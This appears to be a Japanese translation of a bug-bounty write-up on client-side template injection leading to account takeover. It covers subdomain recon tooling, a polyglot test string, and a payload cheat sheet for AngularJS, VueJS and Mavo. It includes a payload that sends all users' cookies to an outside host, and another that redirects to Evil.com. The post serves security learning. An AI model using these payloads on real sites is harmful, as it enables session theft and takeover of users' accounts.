Shikata Ga Nai

Private? There is no such things.

C.S.T.I Lead To Account Takeover $$$を訳してみた

Hello there, ('ω')ノ

 

C.S.T.Iがアカウントの乗っ取りにつながるを。

 

脆弱性:

 CSTI

 アカウントの乗っ取り

 

記事:

 https://systemweakness.com/c-s-t-i-lead-to-account-takeover-f21ea07d9141

 

はじめに偵察するために131のドメインを持っていたので。

サブドメイン列挙に対してクイックコマンドを実行することに。

subfinder 、findomain、amass、assetfinderを使用してサブドメインを検索して。

deduplicatedを使用して重複を削除し、httpxを2回使用して。

 

https://github.com/Findomain/Findomain

 

https://github.com/nytr0gen/deduplicate

 

まず、2xxステータスコードを見つけるために。

httpxを実行して有効なサブドメインを検索して。

2xx.txtリストからスクリーンショットを撮って。

 

下記は、インジェクトで多くの脆弱性をテストすることにつながる。

魔法のペイロードで。

 `“‘><img src=x onerror=promtp(7)>`”’${{8*8}}

 

このペイロードは単純ですが。

HTMLインジェクション、XSS、C.S.T.I、S.S.T.Iをテストするのに役立って。

 

このサブドメインでは、会社のようなアカウントを作成して。

他のユーザを招待できて。

管理者は他のユーザを会社に招待できて。

一方、エンドポイントでは、通常のユーザと管理者がページを作成でき。

このページには多くの入力があり、写真などをアップロードできて。

 

ページの一部で魔法のペイロードを入力すると64を返したので脆弱であると判断し。

下記のペイロードを使用すると。

すべてのユーザのCookieを盗み、完全なアカウントを乗っ取ることができて。

{{constructor.constructor('new Image().src="http://192.168.149.128/bogus.php?output="+document.cookie;')()}}

 

下記を使用するとページをリダイレクトできて。

{{constructor.constructor('location.replace("https://Evil.com")')()}}

 

下記は、さまざまなJavaScriptライブラリのペイロードで。

 

AngularJS:

{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}

 

VueJS:

V3:

 {{_openBlock.constructor('alert(1)')()}}

V2:

 {{constructor.constructor('alert(1)')()}}

 

Mavo:

[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]

 

Best regards, (^^ゞ